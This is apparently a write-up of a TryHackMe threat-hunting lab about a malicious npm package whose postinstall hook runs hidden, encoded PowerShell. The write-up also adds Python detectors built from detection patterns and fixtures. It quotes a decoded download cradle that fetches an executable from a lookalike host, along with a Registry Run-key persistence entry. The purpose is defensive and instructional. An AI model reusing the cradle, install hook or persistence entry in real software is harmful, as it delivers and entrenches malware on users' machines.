TryHackMe - Threat Hunting Simulator - Health Hazard
Scenario overview


After months of juggling content calendars and caffeine-fueled brainstorming, co-founder Tom Whiskers finally carved out time to build the company’s first website. It was supposed to be simple: follow a tutorial, install a few packages, and bring the brand to life with lightweight JavaScript magic.

But between sleepless nights and copy-pasted code, Tom started feeling off. Not sick exactly, just off. The terminal scrolled with reassuring green text, the site loaded fine, and everything looked normal.

Then, a strange file appeared on the system. No one could say where it came from. It wasn’t part of the tutorial, didn’t match any known dependencies, and didn’t even run.

It just waited.

 

Scenario objectives


  • Determine how a threat actor first gained a foothold on the system. Identify suspicious activity that may point to the initial compromise method.
  • Investigate signs of malicious execution following the initial access. Analyse the logs and system behaviour to uncover the attacker's actions.
  • Identify any mechanisms the attacker used to maintain access across system restarts or user sessions. Look for indicators of persistence that could allow long-term control.




Initial Access – Supply Chain Attack

Process Created: node.exe -c npm install healthchk-lib@1.0.1

CommandLine: "C:\Program Files\nodejs\node.exe"

[21/06/2025 10:58:27 AM]
Process Created:
Image: powershell.exe
Parent: cmd.exe
CommandLine: powershell.exe -NoP -W Hidden -EncodedCommand ...
→ Triggered from: C:\Development\node_modules\healthchk-lib\scripts\postinstall.ps1

The foothold is the dependency itself. healthchk-lib@1.0.1 ships a postinstall lifecycle script, and npm runs install-time hooks (preinstall, install, postinstall) automatically at the end of `npm install`, with no prompt and no separate action from the user. On Windows npm hands the hook to cmd.exe, which is why PowerShell shows up with cmd.exe as its parent and node.exe as its grandparent: a process chain a normal front-end build rarely produces, and a good first pivot when hunting for this class of compromise. Tom never ran anything himself; installing the package was enough.
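To hunt for this entry point on a developer machine, the thing to enumerate is install-time lifecycle scripts in every package.json under node_modules, since those are what npm executes for you. The script below is an added example and not part of the original write-up or the TryHackMe room; the package.json contents it builds are constructed fixtures (the page only shows the path of postinstall.ps1, not the manifest), and the marker list is a starting point, not a complete signature set.

```python
import json
import tempfile
from pathlib import Path

# npm runs these lifecycle hooks automatically during `npm install`
# (unless --ignore-scripts is set), so they are the supply-chain entry point to audit.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Markers that have no business in the install hook of an ordinary JavaScript library.
SUSPICIOUS_MARKERS = (
    "powershell", "-encodedcommand", "-enc ", "-w hidden", "-windowstyle hidden",
    "cmd /c", "cmd.exe", "mshta", "rundll32", "regsvr32", "certutil",
    "invoke-webrequest", "iwr ", "curl ", "wget ", "downloadfile", "downloadstring",
)


def find_install_hooks(node_modules: Path) -> list:
    """Return (package, hook, command) for every install-time script under node_modules."""
    findings = []
    for manifest in sorted(node_modules.rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, do not abort the audit
        scripts = data.get("scripts") or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((data.get("name", manifest.parent.name), hook, scripts[hook]))
    return findings


def is_suspicious(command: str) -> bool:
    lowered = command.lower()
    return any(marker in lowered for marker in SUSPICIOUS_MARKERS)


def audit(node_modules: Path) -> list:
    """Only the hooks carrying a suspicious marker; the remaining hooks still deserve a manual look."""
    return [hit for hit in find_install_hooks(node_modules) if is_suspicious(hit[2])]


def build_sample_tree() -> Path:
    """Constructed fixture: one benign package and one hostile package modelled on the scenario.
    The manifests are assumptions; the page only shows scripts/postinstall.ps1 being launched."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    (root / "tiny-util").mkdir(parents=True)
    (root / "tiny-util" / "package.json").write_text(json.dumps(
        {"name": "tiny-util", "version": "2.0.0", "scripts": {"test": "node test.js"}}))
    (root / "healthchk-lib").mkdir(parents=True)
    (root / "healthchk-lib" / "package.json").write_text(json.dumps({
        "name": "healthchk-lib", "version": "1.0.1",
        "scripts": {"postinstall": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File scripts/postinstall.ps1"},
    }))
    return root


if __name__ == "__main__":
    for name, hook, cmd in audit(build_sample_tree()):
        print(f"[!] {name}: {hook} -> {cmd}")
```

Point it at a real `node_modules` directory instead of `build_sample_tree()` to audit a project. The preventive counterpart is `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc), which stops npm running any lifecycle hook at install time at the cost of breaking packages that genuinely need one.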



Execution – Obfuscated PowerShell

Process Created: powershell.exe
ParentImage: cmd.exe
GrandParentImage: node.exe
CommandLine: powershell.exe -NoP -W Hidden -EncodedCommand JABkAGUAcw...

[21/06/2025 10:58:27 AM]
Decoded Command:
$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"
$dest = "$env:APPDATA\SystemHealthUpdater.exe"
Invoke-WebRequest -Uri $url -OutFile $dest


The -EncodedCommand argument is the script encoded as UTF-16LE text and then Base64, so nothing in the raw command line gives away its purpose until it is decoded. Decoded, it is a plain download cradle: Invoke-WebRequest fetches SystemHealthUpdater.exe from global-update.wlndows.thm (a lookalike domain, with a lowercase L where "windows" has its i) and writes it to %APPDATA%, a user-writable directory that needs no elevation. This matches the unexplained file from the scenario: it was dropped by the install hook, not by anything Tom ran.
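Decoding the blob and scoring the surrounding process-creation event is the core of this hunt, so here is an added example that does both; it is not code from the original write-up or the TryHackMe room. It goes slightly beyond the page by also flagging lookalike hostnames through a small confusable-character fold (l, 1, | to i and 0 to o), and by handling a truncated or corrupt Base64 blob. The encoded command it inspects is constructed by re-encoding the decoded script the page shows, because the page truncates the real blob; the image paths in the fixture are assumptions.

```python
import base64
import ntpath
import re

# -EncodedCommand takes the script as UTF-16LE text, Base64 encoded. The encoder is only
# used to construct the fixture below; the page shows the decoded script, not the full blob.
def encode_command(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le")


ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer",
    re.IGNORECASE)
DROP_DIR_RE = re.compile(r"\$env:(?:APPDATA|LOCALAPPDATA|TEMP|TMP|PUBLIC)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Brands an attacker imitates in a download host. Confusable characters are folded on both
# sides before comparison, so "wlndows" is caught as an imitation of "windows".
BRANDS = ("windows", "microsoft")
_FOLD = str.maketrans({"l": "i", "1": "i", "|": "i", "0": "o"})


def lookalike_brand(url: str):
    host = re.sub(r"^https?://", "", url).split("/")[0].lower()
    for brand in BRANDS:
        if brand not in host and brand.translate(_FOLD) in host.translate(_FOLD):
            return brand
    return None


def analyse_process_event(event: dict) -> dict:
    """Tag a process-creation event (Sysmon Event ID 1 style fields) for the analyst to pivot on."""
    cmdline = event.get("CommandLine", "")
    chain = [ntpath.basename(event.get(k, "")).lower()
             for k in ("GrandParentImage", "ParentImage", "Image")]
    tags, decoded = [], ""

    if chain[-1] == "powershell.exe" and "node.exe" in chain:
        tags.append("powershell_spawned_by_node")  # npm lifecycle hook -> cmd.exe -> powershell.exe
    if HIDDEN_RE.search(cmdline):
        tags.append("hidden_window")

    m = ENCODED_RE.search(cmdline)
    if m:
        tags.append("encoded_command")
        try:
            decoded = decode_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = ""  # truncated or corrupt blob: keep the tag, nothing further to inspect

    body = decoded or cmdline
    if CRADLE_RE.search(body):
        tags.append("download_cradle")
    if DROP_DIR_RE.search(body):
        tags.append("drop_in_user_profile")
    urls = URL_RE.findall(body)
    if any(lookalike_brand(u) for u in urls):
        tags.append("lookalike_domain")
    return {"chain": chain, "tags": tags, "urls": urls, "decoded": decoded}


# Constructed fixtures: the decoded script from the page, re-encoded the way PowerShell expects,
# and a benign interactive PowerShell launch for comparison.
SAMPLE_SCRIPT = (
    '$url = "http://global-update.wlndows.thm/SystemHealthUpdater.exe"\n'
    '$dest = "$env:APPDATA\\SystemHealthUpdater.exe"\n'
    'Invoke-WebRequest -Uri $url -OutFile $dest\n'
)
SAMPLE_EVENT = {
    "Image": "powershell.exe", "ParentImage": "cmd.exe", "GrandParentImage": "node.exe",
    "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT),
}
BENIGN_EVENT = {
    "Image": "powershell.exe", "ParentImage": "explorer.exe", "GrandParentImage": "userinit.exe",
    "CommandLine": "powershell.exe -NoProfile -Command Get-Process",
}

if __name__ == "__main__":
    for ev in (SAMPLE_EVENT, BENIGN_EVENT):
        r = analyse_process_event(ev)
        print(" -> ".join(r["chain"]), r["tags"], r["urls"])
```

The chain check is the cheapest signal here: node.exe as grandparent of a hidden, encoded PowerShell is rare in legitimate developer activity, while each of the other tags on its own (an encoded command, a web request) is common enough that it needs corroboration.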



Persistence – Registry Run Key

[21/06/2025 10:58:27 AM]
Event ID: 13 (Registry SetValue)
TargetObject:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Value Name: Windows Update Monitor
Value Data: powershell.exe -NoP -W Hidden -EncodedCommand ...


This is the persistence mechanism. Sysmon Event ID 13 (RegistryEvent: Value Set) records a new value, Windows Update Monitor, written under the current user's Run key, so the same hidden, encoded PowerShell command runs again every time Tom logs on. Because the key is in HKCU, no administrative rights were needed, and the value name is chosen to blend in with genuine Windows components. All three events share the same timestamp, 10:58:27, so the install hook downloaded the payload and registered the autostart in a single pass.
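Hunting this stage means reviewing every Event ID 13 that lands in an autostart key, then looking at what the value actually launches. The detector below is an added example, not code from the original write-up or the TryHackMe room. Its events are constructed fixtures in the shape the page uses (Sysmon appends the value name to TargetObject and puts the written data in Details); the encoded payload in the malicious sample is an assumption, since the page truncates it, and is built the same way PowerShell expects.

```python
import base64
import re

# Sysmon Event ID 13 (RegistryEvent: Value Set): TargetObject is key + value name, Details is the data.
AUTORUN_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)(?:\\|$)", re.IGNORECASE)
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|certutil)(\.exe)?\b", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
PROFILE_PATH_RE = re.compile(
    r"(%APPDATA%|%TEMP%|%LOCALAPPDATA%|\$env:(?:APPDATA|TEMP|LOCALAPPDATA)|\\Users\\[^\\]+\\AppData\\)",
    re.IGNORECASE)


def classify_autorun(event: dict):
    """None if the write is not to an autorun key; otherwise value name, scope and reasons to look closer."""
    target = event.get("TargetObject", "")
    m = AUTORUN_RE.search(target) if event.get("EventID") == 13 else None
    if not m:
        return None
    value_name = target[m.end():] or event.get("ValueName", "")
    scope = "user" if target.upper().startswith(("HKU\\", "HKCU\\")) else "machine"
    data = event.get("Details", "")
    reasons, decoded = [], ""

    if LOLBIN_RE.search(data):
        reasons.append("script_host_or_lolbin")  # autoruns normally point at a product binary, not a shell
    if HIDDEN_RE.search(data):
        reasons.append("hidden_window")
    e = ENCODED_RE.search(data)
    if e:
        reasons.append("encoded_command")
        try:
            decoded = base64.b64decode(e.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = ""
    if PROFILE_PATH_RE.search(data + decoded):
        reasons.append("runs_from_user_profile")
    return {"value_name": value_name, "scope": scope, "reasons": reasons, "decoded": decoded}


# Constructed fixtures. The encoded payload is assumed (a launcher for the dropped file);
# the page only shows "-EncodedCommand ...".
_PAYLOAD = base64.b64encode('Start-Process "$env:APPDATA\\SystemHealthUpdater.exe"'.encode("utf-16-le")).decode()
MALICIOUS = {
    "EventID": 13,
    "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update Monitor",
    "Details": "powershell.exe -NoP -W Hidden -EncodedCommand " + _PAYLOAD,
}
BENIGN = {
    "EventID": 13,
    "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
    "Details": r"C:\Windows\System32\SecurityHealthSystray.exe",
}
UNRELATED = {
    "EventID": 13,
    "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
    "Details": "DWORD (0x00000001)",
}

if __name__ == "__main__":
    for ev in (MALICIOUS, BENIGN, UNRELATED):
        print(ev["TargetObject"], "->", classify_autorun(ev))
```

The value name is deliberately not scored: legitimate Windows autoruns such as SecurityHealth sound just as official as "Windows Update Monitor", so the name tells you nothing on its own. The user-profile path check is also weaker than it looks, because per-user software such as OneDrive installs under AppData; the combination of a script host, a hidden window and an encoded command in a Run value is what makes this entry stand out.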



Thank you for watching, and I hope you enjoyed this challenge!
